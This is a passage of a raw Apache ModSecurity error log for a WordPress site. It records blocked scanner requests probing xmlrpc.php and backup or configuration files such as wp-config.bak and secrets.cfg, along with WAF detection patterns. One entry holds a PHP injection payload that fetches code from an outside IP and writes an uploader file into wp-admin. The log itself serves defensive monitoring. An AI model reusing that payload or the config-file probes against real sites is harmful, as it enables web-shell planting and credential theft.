"PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZG4UjZ89C7hBdMavnRpiygAAAQ0"] [Wed May 24 08:43:42.206671 2023] [:error] [pid 21024:tid 140485010577152] [client 5.188.62.26:56840] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZG4UjvgBjQ7QpcyedN7k0wAAAMA"] [Wed May 24 08:43:43.767770 2023] [:error] [pid 1632:tid 140484882196224] [client 5.188.62.26:56842] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZG4Uj589C7hBdMavnRpiywAAAQc"] [Thu May 25 03:50:20.497981 2023] [ssl:warn] [pid 7752:tid 139808691021696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 25 03:50:20.638165 2023] [ssl:warn] [pid 7753:tid 139808691021696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 25 03:50:21.065655 2023] [ssl:warn] [pid 7753:tid 139808691021696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 25 03:50:22.711092 2023] [ssl:warn] [pid 7753:tid 139808691021696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 25 03:50:25.183772 2023] [ssl:warn] [pid 8205:tid 140528166848384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 25 03:50:25.308586 2023] [ssl:warn] [pid 8206:tid 140528166848384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 25 17:46:14.589940 2023] [ssl:warn] [pid 8206:tid 140528166848384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 26 03:43:15.722777 2023] [ssl:warn] [pid 2066:tid 140150695053184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 26 03:43:15.864449 2023] [ssl:warn] [pid 2067:tid 140150695053184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 26 03:43:16.212336 2023] [ssl:warn] [pid 2067:tid 140150695053184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 26 03:43:18.643067 2023] [ssl:warn] [pid 2067:tid 140150695053184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 26 03:43:20.888744 2023] [ssl:warn] [pid 2517:tid 140394138052480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 26 03:43:21.049585 2023] [ssl:warn] [pid 2518:tid 140394138052480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 26 10:13:57.133465 2023] [:error] [pid 2540:tid 140393731540736] [client 170.106.119.125:33446] [client 170.106.119.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZHDMtTEcMwvj45y19nDNzwAAAJI"], referer: www.google.com [Fri May 26 12:31:42.071899 2023] [ssl:warn] [pid 2518:tid 140394138052480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 03:18:17.451436 2023] [ssl:warn] [pid 18135:tid 140498626242432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 03:18:17.604690 2023] [ssl:warn] [pid 18136:tid 140498626242432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 03:18:18.060152 2023] [ssl:warn] [pid 18136:tid 140498626242432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 03:18:19.782488 2023] [ssl:warn] [pid 18136:tid 140498626242432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 03:18:22.050264 2023] [ssl:warn] [pid 18648:tid 140152527460224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 03:18:22.182734 2023] [ssl:warn] [pid 18649:tid 140152527460224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 27 08:05:07.314458 2023] [:error] [pid 19345:tid 140152313267968] [client 44.204.213.38:59780] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "ZHIAA6seEgYlJ2mSC22CagAAAMQ"] [Sat May 27 08:05:21.647387 2023] [:error] [pid 19345:tid 140152148023040] [client 44.204.213.38:59824] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "ZHIAEaseEgYlJ2mSC22CcgAAAM8"] [Sat May 27 08:05:21.885775 2023] [:error] [pid 19345:tid 140152131237632] [client 44.204.213.38:59826] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZHIAEaseEgYlJ2mSC22CcwAAANE"] [Sat May 27 08:06:58.009091 2023] [:error] [pid 18667:tid 140152156415744] [client 44.204.213.38:60120] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/app.conf"] [unique_id "ZHIAcq49OcC-vu0WStrdGwAAAE4"] [Sat May 27 08:07:06.987953 2023] [:error] [pid 18667:tid 140152189986560] [client 44.204.213.38:60144] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/server.cfg"] [unique_id "ZHIAeq49OcC-vu0WStrdIQAAAEo"] [Sat May 27 08:07:32.823680 2023] [:error] [pid 19345:tid 140152072488704] [client 44.204.213.38:60222] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/development.ini"] [unique_id "ZHIAlKseEgYlJ2mSC22CvgAAANg"] [Sat May 27 08:07:36.537748 2023] [:error] [pid 19345:tid 140152181593856] [client 44.204.213.38:60240] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/application.conf"] [unique_id "ZHIAmKseEgYlJ2mSC22CwwAAAMs"] [Sat May 27 08:07:47.727221 2023] [:error] [pid 18668:tid 140152330053376] [client 44.204.213.38:60266] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/web.config"] [unique_id "ZHIAo-1JY8tdWlWTAmN84QAAAII"] [Sat May 27 08:07:49.965771 2023] [:error] [pid 19345:tid 140152080881408] [client 44.204.213.38:60272] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/config.ini"] [unique_id "ZHIApaseEgYlJ2mSC22CzAAAANc"] [Sat May 27 08:07:52.406651 2023] [:error] [pid 19345:tid 140152089274112] [client 44.204.213.38:60278] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database.ini"] [unique_id "ZHIAqKseEgYlJ2mSC22CzwAAANY"] [Sat May 27 08:07:57.434917 2023] [:error] [pid 18666:tid 140152164808448] [client 44.204.213.38:60294] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/settings.ini"] [unique_id "ZHIAra6McCjmj15xRvrVtwAAAA0"] [Sat May 27 08:07:59.613503 2023] [:error] [pid 19345:tid 140152231950080] [client 44.204.213.38:60300] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/global.ini"] [unique_id "ZHIAr6seEgYlJ2mSC22C0wAAAMU"] [Sat May 27 08:08:01.753419 2023] [:error] [pid 19345:tid 140152164808448] [client 44.204.213.38:60306] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/local.ini"] [unique_id "ZHIAsaseEgYlJ2mSC22C1AAAAM0"] [Sat May 27 08:08:04.842649 2023] [:error] [pid 18667:tid 140152156415744] [client 44.204.213.38:60316] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/app.config"] [unique_id "ZHIAtK49OcC-vu0WStrdNAAAAE4"] [Sat May 27 08:08:26.614914 2023] [:error] [pid 19345:tid 140152164808448] [client 44.204.213.38:60394] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/connectionstrings.ini"] [unique_id "ZHIAyqseEgYlJ2mSC22C4QAAAM0"] [Sat May 27 08:08:26.910957 2023] [:error] [pid 18668:tid 140152072488704] [client 44.204.213.38:60396] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/settings.cfg"] [unique_id "ZHIAyu1JY8tdWlWTAmN87AAAAJg"] [Sat May 27 08:08:27.186117 2023] [:error] [pid 19345:tid 140152223557376] [client 44.204.213.38:60398] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/secrets.cfg"] [unique_id "ZHIAy6seEgYlJ2mSC22C4gAAAMY"] [Sat May 27 08:08:27.463285 2023] [:error] [pid 19345:tid 140152198379264] [client 44.204.213.38:60400] [client 44.204.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag 